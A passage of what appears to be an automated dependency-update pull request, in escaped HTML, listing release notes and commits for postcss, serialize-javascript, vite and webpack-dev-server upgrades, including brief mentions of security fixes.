href=\"https://github.com/JounQin\"\u003e\u003ccode\u003e@​JounQin\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Parcel compatibility issue (by \u003ca href=\"https://github.com/git-sumitchaudhary\"\u003e\u003ccode\u003e@​git-sumitchaudhary\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.3\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/eae46db765d752cf8f40c4fa2b0b85030079c43d\"\u003e\u003ccode\u003eeae46db\u003c/code\u003e\u003c/a\u003e Release 8.5.15 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/79508ffa59e42c02056aca61b88bc393c8b516c4\"\u003e\u003ccode\u003e79508ff\u003c/code\u003e\u003c/a\u003e Update CI actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/b128e2131288a411c6e28071d0929542c49e74eb\"\u003e\u003ccode\u003eb128e21\u003c/code\u003e\u003c/a\u003e Speed up declaration parsing by avoiding creating new array on each token\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/9825dca02c33cf610e2a842be767468b67fbecf9\"\u003e\u003ccode\u003e9825dca\u003c/code\u003e\u003c/a\u003e Fix code format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/55789c865281e2be194fa5b4e41dd046be3a2307\"\u003e\u003ccode\u003e55789c8\u003c/code\u003e\u003c/a\u003e Update dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/84fbbe9009cb3cc3bbb4cc3a9b65d468f4844d95\"\u003e\u003ccode\u003e84fbbe9\u003c/code\u003e\u003c/a\u003e Install older pnpm action for old Node.js\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/9f860bd78ec1dbc4f0ae72d693f03f956baa38cb\"\u003e\u003ccode\u003e9f860bd\u003c/code\u003e\u003c/a\u003e Revert pnpm action for old Node.js\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/08771986d47359545f502e009763e223b66bfcf6\"\u003e\u003ccode\u003e0877198\u003c/code\u003e\u003c/a\u003e Update CI actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/b2d1a335cea818f8b27e5cfb90147648afe3e582\"\u003e\u003ccode\u003eb2d1a33\u003c/code\u003e\u003c/a\u003e Fix linter warnings\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/0700dac92283bc259977dff2743ca74a00f58267\"\u003e\u003ccode\u003e0700dac\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2088\"\u003e#2088\u003c/a\u003e from rootvector2/add-oss-fuzz-harness\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/postcss/postcss/compare/8.4.31...8.5.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `serialize-javascript` from 6.0.1 to 7.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/yahoo/serialize-javascript/releases\"\u003eserialize-javascript's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.0.5\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eImprove robustness and validation for array-like object serialization.\u003c/li\u003e\n\u003cli\u003eFix an issue where certain object structures could lead to excessive CPU usage.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eFor more details, please see GHSA-qj8w-gfj5-8c6v.\u003c/p\u003e\n\u003ch2\u003ev7.0.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease: v7.0.4 by \u003ca href=\"https://github.com/okuryu\"\u003e\u003ccode\u003e@​okuryu\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/211\"\u003eyahoo/serialize-javascript#211\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/yahoo/serialize-javascript/compare/v7.0.3...v7.0.4\"\u003ehttps://github.com/yahoo/serialize-javascript/compare/v7.0.3...v7.0.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.0.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(CVE-2020-7660): fix for RegExp.flags and  Date.prototype.toISOString (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/207\"\u003e#207\u003c/a\u003e)  2e609d0\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump lodash from 4.17.21 to 4.17.23 (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/206\"\u003e#206\u003c/a\u003e)  42b7cdb\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/compare/v7.0.2...v7.0.3\"\u003ehttps://github.com/yahoo/serialize-javascript/compare/v7.0.2...v7.0.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.0.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eci: bump GitHub Actions to latest versions by \u003ca href=\"https://github.com/okuryu\"\u003e\u003ccode\u003e@​okuryu\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/203\"\u003eyahoo/serialize-javascript#203\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: setup trusted publishing workflow by \u003ca href=\"https://github.com/okuryu\"\u003e\u003ccode\u003e@​okuryu\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/204\"\u003eyahoo/serialize-javascript#204\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erelease: v7.0.2 by \u003ca href=\"https://github.com/okuryu\"\u003e\u003ccode\u003e@​okuryu\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/205\"\u003eyahoo/serialize-javascript#205\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/yahoo/serialize-javascript/compare/v7.0.1...v7.0.2\"\u003ehttps://github.com/yahoo/serialize-javascript/compare/v7.0.1...v7.0.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.0.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd warning about using this package to send arbitrary data to worker threads by \u003ca href=\"https://github.com/valadaptive\"\u003e\u003ccode\u003e@​valadaptive\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/200\"\u003eyahoo/serialize-javascript#200\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003esecurity: sanitize function bodies by \u003ca href=\"https://github.com/redonkulus\"\u003e\u003ccode\u003e@​redonkulus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/199\"\u003eyahoo/serialize-javascript#199\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: tweak README by \u003ca href=\"https://github.com/okuryu\"\u003e\u003ccode\u003e@​okuryu\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/201\"\u003eyahoo/serialize-javascript#201\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erelease: v7.0.1 by \u003ca href=\"https://github.com/okuryu\"\u003e\u003ccode\u003e@​okuryu\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/202\"\u003eyahoo/serialize-javascript#202\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redonkulus\"\u003e\u003ccode\u003e@​redonkulus\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/199\"\u003eyahoo/serialize-javascript#199\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/yahoo/serialize-javascript/compare/v7.0.0...v7.0.1\"\u003ehttps://github.com/yahoo/serialize-javascript/compare/v7.0.0...v7.0.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.0.0\u003c/h2\u003e\n\u003ch2\u003eBreaking Changes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erequires Node.js v20+\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump mocha from 10.2.0 to 10.4.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/178\"\u003eyahoo/serialize-javascript#178\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/df3f1c1fa9ca16b050ae893cb63ac23c91deed55\"\u003e\u003ccode\u003edf3f1c1\u003c/code\u003e\u003c/a\u003e release: v7.0.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/f147e90269b58bb6e539cfdf3d0e20d6ad14204b\"\u003e\u003ccode\u003ef147e90\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/eec32e08c5ac51bba2d8042101f6d2622c133110\"\u003e\u003ccode\u003eeec32e0\u003c/code\u003e\u003c/a\u003e release: v7.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/d50571505a7776191346d714618867455b3354c1\"\u003e\u003ccode\u003ed505715\u003c/code\u003e\u003c/a\u003e 7.0.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/2e609d0a9f4f5b097f0945af88bd45b9c7fb48d9\"\u003e\u003ccode\u003e2e609d0\u003c/code\u003e\u003c/a\u003e fix(CVE-2020-7660): fix for RegExp.flags and  Date.prototype.toISOString (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/207\"\u003e#207\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/42b7cdbf32c289f42d7d9247fd3261dc7550e9ce\"\u003e\u003ccode\u003e42b7cdb\u003c/code\u003e\u003c/a\u003e build(deps-dev): bump lodash from 4.17.21 to 4.17.23 (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/206\"\u003e#206\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/44f544b85a8e2719890a0853184d83c4ecbc9bcb\"\u003e\u003ccode\u003e44f544b\u003c/code\u003e\u003c/a\u003e release: v7.0.2 (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/205\"\u003e#205\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/bba0ddd954b5bcca48857f9cb5f16379aa143b26\"\u003e\u003ccode\u003ebba0ddd\u003c/code\u003e\u003c/a\u003e ci: setup trusted publishing workflow (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/204\"\u003e#204\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/235f6ea0b827bdc1625046522b0bc50fd582c412\"\u003e\u003ccode\u003e235f6ea\u003c/code\u003e\u003c/a\u003e ci: bump GitHub Actions to latest versions (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/203\"\u003e#203\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/f7fff15630a450dfcbcb88d33f7dc30b4f1e41f8\"\u003e\u003ccode\u003ef7fff15\u003c/code\u003e\u003c/a\u003e release: v7.0.1 (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/202\"\u003e#202\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/yahoo/serialize-javascript/compare/v6.0.1...v7.0.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for serialize-javascript since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `vite` from 4.4.7 to 7.3.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/blob/v4.5.14/packages/vite/CHANGELOG.md\"\u003evite's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.14 (2025-04-30)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19965\"\u003e#19965\u003c/a\u003e, check static serve file inside sirv (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19967\"\u003e#19967\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/7739479\"\u003e7739479\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19965\"\u003e#19965\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19967\"\u003e#19967\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: run format (\u003ca href=\"https://github.com/vitejs/vite/commit/99afb60\"\u003e99afb60\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.13 (2025-04-10)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19830\"\u003e#19830\u003c/a\u003e, reject requests with \u003ccode\u003e#\u003c/code\u003e in request-target (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19832\"\u003e#19832\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/41f3819\"\u003e41f3819\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19830\"\u003e#19830\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19832\"\u003e#19832\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.12 (2025-04-03)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19782\"\u003e#19782\u003c/a\u003e, fs check with svg and relative paths (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19785\"\u003e#19785\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/0a3dcf5\"\u003e0a3dcf5\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19782\"\u003e#19782\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19785\"\u003e#19785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.11 (2025-03-31)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19761\"\u003e#19761\u003c/a\u003e, fs check in transform middleware (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19763\"\u003e#19763\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/26e1764\"\u003e26e1764\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19761\"\u003e#19761\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19763\"\u003e#19763\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.10 (2025-03-24)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19702\"\u003e#19702\u003c/a\u003e, fs raw query with query separators (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19704\"\u003e#19704\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/315695e\"\u003e315695e\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19702\"\u003e#19702\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19704\"\u003e#19704\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.9 (2025-01-21)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: \u003ccode\u003epreview.allowedHosts\u003c/code\u003e with specific values was not respected (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19246\"\u003e#19246\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/0bc52e0\"\u003e0bc52e0\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19246\"\u003e#19246\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: allow CORS from loopback addresses by default (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19249\"\u003e#19249\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/8f63cd6\"\u003e8f63cd6\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19249\"\u003e#19249\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.8 (2025-01-20)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: try parse \u003ccode\u003eserver.origin\u003c/code\u003e URL (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19241\"\u003e#19241\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/3680bad\"\u003e3680bad\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19241\"\u003e#19241\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.7 (2025-01-20)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: \u003ccode\u003ecrypto.getRandomValues\u003c/code\u003e is not available in old Node versions (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19237\"\u003e#19237\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/f4d3c46\"\u003ef4d3c46\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19237\"\u003e#19237\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/9bfe2b1bc5d755cd7898d17147b9a1bb7f55fed2\"\u003e\u003ccode\u003e9bfe2b1\u003c/code\u003e\u003c/a\u003e release: v4.5.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/7739479d87330b367c9338b732ed9789871082cc\"\u003e\u003ccode\u003e7739479\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19965\"\u003e#19965\u003c/a\u003e, check static serve file inside sirv (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19967\"\u003e#19967\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/99afb601e9d5d6cad25b38f44ce4c02083dbcb62\"\u003e\u003ccode\u003e99afb60\u003c/code\u003e\u003c/a\u003e chore: run format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/cd60e8bb2e354ca03d2e5e5b0d0a151cf40698e2\"\u003e\u003ccode\u003ecd60e8b\u003c/code\u003e\u003c/a\u003e release: v4.5.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/41f3819c869b86aec02e760fd3dabd5e370db284\"\u003e\u003ccode\u003e41f3819\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19830\"\u003e#19830\u003c/a\u003e, reject requests with \u003ccode\u003e#\u003c/code\u003e in request-target (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19832\"\u003e#19832\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/6104add2ed0204b9821f73dc230f9c05caaad405\"\u003e\u003ccode\u003e6104add\u003c/code\u003e\u003c/a\u003e release: v4.5.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/0a3dcf5875de6bcea64e2f75bfa452740ca3dfb0\"\u003e\u003ccode\u003e0a3dcf5\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19782\"\u003e#19782\u003c/a\u003e, fs check with svg and relative paths (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19785\"\u003e#19785\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/07ddc3ea3e5750f4761169064be87122f9b698f1\"\u003e\u003ccode\u003e07ddc3e\u003c/code\u003e\u003c/a\u003e release: v4.5.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/26e1764d54e7440d90226ebb82acbed457807d30\"\u003e\u003ccode\u003e26e1764\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19761\"\u003e#19761\u003c/a\u003e, fs check in transform middleware (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19763\"\u003e#19763\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/86e7a6b8e40cd2fd545744b82b2bc805ced92847\"\u003e\u003ccode\u003e86e7a6b\u003c/code\u003e\u003c/a\u003e release: v4.5.10\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vitejs/vite/commits/v4.5.14/packages/vite\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 4.15.1 to 5.2.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e 